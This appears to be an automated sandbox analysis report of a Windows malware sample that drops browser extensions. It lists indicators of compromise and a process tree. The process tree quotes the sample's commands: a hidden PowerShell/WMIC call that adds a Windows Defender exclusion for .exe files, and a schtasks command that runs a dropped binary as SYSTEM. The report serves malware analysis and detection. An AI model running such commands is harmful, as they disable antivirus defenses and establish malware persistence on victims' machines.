Analysis
-
max time kernel
111s -
max time network
120s -
platform
windows11-21h2_x64 -
resource
win11-20240221-en -
resource tags
arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system -
submitted
06/04/2024, 05:00
Static task
static1
Behavioral task
behavioral1
Sample
0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe
Resource
win10v2004-20240226-en
General
-
Target
0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe
-
Size
6.3MB
-
MD5
31c65b51016a5ea1b97de351bdc3a34e
-
SHA1
84b3f9e243cf7d2e607dc482c81fe2e2c7271378
-
SHA256
0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184
-
SHA512
a53dd6639c4e99e49d419009f947e55b38426a4794c30ccaae546717927a5c4599f88203583bf065bd5a020d6f8b4ffc68dc4b402cbca8cf6d8f7fe39f60e476
-
SSDEEP
196608:91O9hrfn90vjbQL0MZMFoENqo0C029v7CGQp0wx:3OLrojkLwFo51ETCGa0wx
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 17 1948 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1637591879-962683004-3585269084-1000\Control Panel\International\Geo\Nation kZxhwqG.exe -
Executes dropped EXE 3 IoCs
pid Process 2828 Install.exe 3016 dkBeKWG.exe 4588 kZxhwqG.exe -
Loads dropped DLL 1 IoCs
pid Process 1948 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json kZxhwqG.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json kZxhwqG.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini kZxhwqG.exe -
Drops file in System32 directory 31 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 kZxhwqG.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft kZxhwqG.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol dkBeKWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 kZxhwqG.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 kZxhwqG.exe File created C:\Windows\system32\GroupPolicy\gpt.ini dkBeKWG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA kZxhwqG.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 kZxhwqG.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\fZHZowTYSgfU2\vZajwhU.xml kZxhwqG.exe File created C:\Program Files (x86)\epUZFeichsCPC\KSFvtct.dll kZxhwqG.exe File created C:\Program Files (x86)\qBvbbKpBU\wTDcpw.dll kZxhwqG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi kZxhwqG.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak kZxhwqG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak kZxhwqG.exe File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\LlqHhEU.xml kZxhwqG.exe File created C:\Program Files (x86)\epUZFeichsCPC\eYzHLaL.xml kZxhwqG.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi kZxhwqG.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja kZxhwqG.exe File created C:\Program Files (x86)\BxVXPYvVqGWoUZKItHR\MxgcLGb.dll kZxhwqG.exe File created C:\Program Files (x86)\VDiAXGzPiWUn\rbfpUFv.dll kZxhwqG.exe File created C:\Program Files (x86)\qBvbbKpBU\xQnaRLd.xml kZxhwqG.exe File created C:\Program Files (x86)\fZHZowTYSgfU2\GwwTbDGcupmwL.dll kZxhwqG.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\bpJjqbWMDOjxkYrvBb.job schtasks.exe File created C:\Windows\Tasks\MWViHNuTpmRlpInKg.job schtasks.exe File created C:\Windows\Tasks\wbeMFPOaxEodGIM.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1776 schtasks.exe 4816 schtasks.exe 808 schtasks.exe 2712 schtasks.exe 4084 schtasks.exe 3128 schtasks.exe 2976 schtasks.exe 1844 schtasks.exe 4928 schtasks.exe 4776 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" kZxhwqG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ kZxhwqG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume kZxhwqG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" dkBeKWG.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" kZxhwqG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix kZxhwqG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d1929823-0000-0000-0000-d01200000000}\NukeOnDelete = "0" kZxhwqG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d1929823-0000-0000-0000-d01200000000} kZxhwqG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" kZxhwqG.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" kZxhwqG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing kZxhwqG.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4936 powershell.exe 4936 powershell.exe 3376 powershell.exe 3376 powershell.exe 864 powershell.exe 864 powershell.exe 4032 powershell.EXE 4032 powershell.EXE 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4352 powershell.exe 4352 powershell.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe 4588 kZxhwqG.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4936 powershell.exe Token: SeIncreaseQuotaPrivilege 956 WMIC.exe Token: SeSecurityPrivilege 956 WMIC.exe Token: SeTakeOwnershipPrivilege 956 WMIC.exe Token: SeLoadDriverPrivilege 956 WMIC.exe Token: SeSystemProfilePrivilege 956 WMIC.exe Token: SeSystemtimePrivilege 956 WMIC.exe Token: SeProfSingleProcessPrivilege 956 WMIC.exe Token: SeIncBasePriorityPrivilege 956 WMIC.exe Token: SeCreatePagefilePrivilege 956 WMIC.exe Token: SeBackupPrivilege 956 WMIC.exe Token: SeRestorePrivilege 956 WMIC.exe Token: SeShutdownPrivilege 956 WMIC.exe Token: SeDebugPrivilege 956 WMIC.exe Token: SeSystemEnvironmentPrivilege 956 WMIC.exe Token: SeRemoteShutdownPrivilege 956 WMIC.exe Token: SeUndockPrivilege 956 WMIC.exe Token: SeManageVolumePrivilege 956 WMIC.exe Token: 33 956 WMIC.exe Token: 34 956 WMIC.exe Token: 35 956 WMIC.exe Token: 36 956 WMIC.exe Token: SeIncreaseQuotaPrivilege 956 WMIC.exe Token: SeSecurityPrivilege 956 WMIC.exe Token: SeTakeOwnershipPrivilege 956 WMIC.exe Token: SeLoadDriverPrivilege 956 WMIC.exe Token: SeSystemProfilePrivilege 956 WMIC.exe Token: SeSystemtimePrivilege 956 WMIC.exe Token: SeProfSingleProcessPrivilege 956 WMIC.exe Token: SeIncBasePriorityPrivilege 956 WMIC.exe Token: SeCreatePagefilePrivilege 956 WMIC.exe Token: SeBackupPrivilege 956 WMIC.exe Token: SeRestorePrivilege 956 WMIC.exe Token: SeShutdownPrivilege 956 WMIC.exe Token: SeDebugPrivilege 956 WMIC.exe Token: SeSystemEnvironmentPrivilege 956 WMIC.exe Token: SeRemoteShutdownPrivilege 956 WMIC.exe Token: SeUndockPrivilege 956 WMIC.exe Token: SeManageVolumePrivilege 956 WMIC.exe Token: 33 956 WMIC.exe Token: 34 956 WMIC.exe Token: 35 956 WMIC.exe Token: 36 956 WMIC.exe Token: SeDebugPrivilege 3376 powershell.exe Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 4032 powershell.EXE Token: SeDebugPrivilege 4352 powershell.exe Token: SeAssignPrimaryTokenPrivilege 4612 WMIC.exe Token: SeIncreaseQuotaPrivilege 4612 WMIC.exe Token: SeSecurityPrivilege 4612 WMIC.exe Token: SeTakeOwnershipPrivilege 4612 WMIC.exe Token: SeLoadDriverPrivilege 4612 WMIC.exe Token: SeSystemtimePrivilege 4612 WMIC.exe Token: SeBackupPrivilege 4612 WMIC.exe Token: SeRestorePrivilege 4612 WMIC.exe Token: SeShutdownPrivilege 4612 WMIC.exe Token: SeSystemEnvironmentPrivilege 4612 WMIC.exe Token: SeUndockPrivilege 4612 WMIC.exe Token: SeManageVolumePrivilege 4612 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 4612 WMIC.exe Token: SeIncreaseQuotaPrivilege 4612 WMIC.exe Token: SeSecurityPrivilege 4612 WMIC.exe Token: SeTakeOwnershipPrivilege 4612 WMIC.exe Token: SeLoadDriverPrivilege 4612 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2132 wrote to memory of 2828 2132 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe 77 PID 2132 wrote to memory of 2828 2132 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe 77 PID 2132 wrote to memory of 2828 2132 0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe 77 PID 2828 wrote to memory of 3508 2828 Install.exe 79 PID 2828 wrote to memory of 3508 2828 Install.exe 79 PID 2828 wrote to memory of 3508 2828 Install.exe 79 PID 3508 wrote to memory of 1792 3508 forfiles.exe 81 PID 3508 wrote to memory of 1792 3508 forfiles.exe 81 PID 3508 wrote to memory of 1792 3508 forfiles.exe 81 PID 1792 wrote to memory of 4936 1792 cmd.exe 82 PID 1792 wrote to memory of 4936 1792 cmd.exe 82 PID 1792 wrote to memory of 4936 1792 cmd.exe 82 PID 4936 wrote to memory of 956 4936 powershell.exe 83 PID 4936 wrote to memory of 956 4936 powershell.exe 83 PID 4936 wrote to memory of 956 4936 powershell.exe 83 PID 2828 wrote to memory of 1776 2828 Install.exe 85 PID 2828 wrote to memory of 1776 2828 Install.exe 85 PID 2828 wrote to memory of 1776 2828 Install.exe 85 PID 3016 wrote to memory of 3376 3016 dkBeKWG.exe 88 PID 3016 wrote to memory of 3376 3016 dkBeKWG.exe 88 PID 3016 wrote to memory of 3376 3016 dkBeKWG.exe 88 PID 3376 wrote to memory of 4944 3376 powershell.exe 90 PID 3376 wrote to memory of 4944 3376 powershell.exe 90 PID 3376 wrote to memory of 4944 3376 powershell.exe 90 PID 4944 wrote to memory of 1416 4944 cmd.exe 91 PID 4944 wrote to memory of 1416 4944 cmd.exe 91 PID 4944 wrote to memory of 1416 4944 cmd.exe 91 PID 3376 wrote to memory of 1216 3376 powershell.exe 92 PID 3376 wrote to memory of 1216 3376 powershell.exe 92 PID 3376 wrote to memory of 1216 3376 powershell.exe 92 PID 3376 wrote to memory of 3076 3376 powershell.exe 93 PID 3376 wrote to memory of 3076 3376 powershell.exe 93 PID 3376 wrote to memory of 3076 3376 powershell.exe 93 PID 3376 wrote to memory of 1648 3376 powershell.exe 94 PID 3376 wrote to memory of 1648 3376 powershell.exe 94 PID 3376 wrote to memory of 1648 3376 powershell.exe 94 PID 3376 wrote to memory of 4072 3376 powershell.exe 95 PID 3376 wrote to memory of 4072 3376 powershell.exe 95 PID 3376 wrote to memory of 4072 3376 powershell.exe 95 PID 3376 wrote to memory of 3904 3376 powershell.exe 96 PID 3376 wrote to memory of 3904 3376 powershell.exe 96 PID 3376 wrote to memory of 3904 3376 powershell.exe 96 PID 3376 wrote to memory of 4964 3376 powershell.exe 97 PID 3376 wrote to memory of 4964 3376 powershell.exe 97 PID 3376 wrote to memory of 4964 3376 powershell.exe 97 PID 3376 wrote to memory of 2336 3376 powershell.exe 98 PID 3376 wrote to memory of 2336 3376 powershell.exe 98 PID 3376 wrote to memory of 2336 3376 powershell.exe 98 PID 3376 wrote to memory of 2640 3376 powershell.exe 99 PID 3376 wrote to memory of 2640 3376 powershell.exe 99 PID 3376 wrote to memory of 2640 3376 powershell.exe 99 PID 3376 wrote to memory of 3392 3376 powershell.exe 100 PID 3376 wrote to memory of 3392 3376 powershell.exe 100 PID 3376 wrote to memory of 3392 3376 powershell.exe 100 PID 3376 wrote to memory of 5072 3376 powershell.exe 101 PID 3376 wrote to memory of 5072 3376 powershell.exe 101 PID 3376 wrote to memory of 5072 3376 powershell.exe 101 PID 3376 wrote to memory of 4972 3376 powershell.exe 102 PID 3376 wrote to memory of 4972 3376 powershell.exe 102 PID 3376 wrote to memory of 4972 3376 powershell.exe 102 PID 3376 wrote to memory of 1836 3376 powershell.exe 103 PID 3376 wrote to memory of 1836 3376 powershell.exe 103 PID 3376 wrote to memory of 1836 3376 powershell.exe 103 PID 3376 wrote to memory of 4580 3376 powershell.exe 104
Processes
-
C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"C:\Users\Admin\AppData\Local\Temp\0ec320aaa56b4b15c383f18c688ee20209ec152e1d716483bc00449a9e5ea184.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2132 -
C:\Users\Admin\AppData\Local\Temp\7zS3671.tmp\Install.exe.\Install.exe /AdidysikD "385118" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2828 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:1792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4936 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:956
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bpJjqbWMDOjxkYrvBb" /SC once /ST 05:01:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe\" Oz /Rhsite_iddhd 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1776
-
-
-
C:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exeC:\Users\Admin\AppData\Local\Temp\BOcTyFPPxAyjCEkla\ZdAYUvLVhVtfvZJ\dkBeKWG.exe Oz /Rhsite_iddhd 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
